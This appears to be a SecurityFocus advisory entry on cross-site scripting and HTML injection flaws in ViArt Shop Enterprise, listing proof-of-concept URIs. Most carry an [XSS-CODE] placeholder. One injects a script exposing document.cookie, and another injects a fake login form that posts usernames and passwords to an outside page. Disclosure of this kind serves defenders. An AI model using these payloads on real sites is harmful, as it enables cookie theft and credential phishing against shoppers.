CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]
http://www.example.com/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http://www.example.com/save.php%22%20method=%22post%22%3EUsername:%3Cinput%20aame=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=%22submit%22%20value=%22Login%22%3E%3C/form%3E
http://www.example.com/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://www.example.com/reviews.php?category_id=0[XSS-CODE]&item_id=4
http://www.example.com/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0
http://www.example.com/product_details.php?item_id=4&category_id=0[XSS-CODE]
http://www.example.com/products.php?category_id=13[XSS-CODE]
http://www.example.com/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=
http://www.example.com/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1
http://www.example.com/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]


 

Privacy Statement
Copyright 2010, SecurityFocus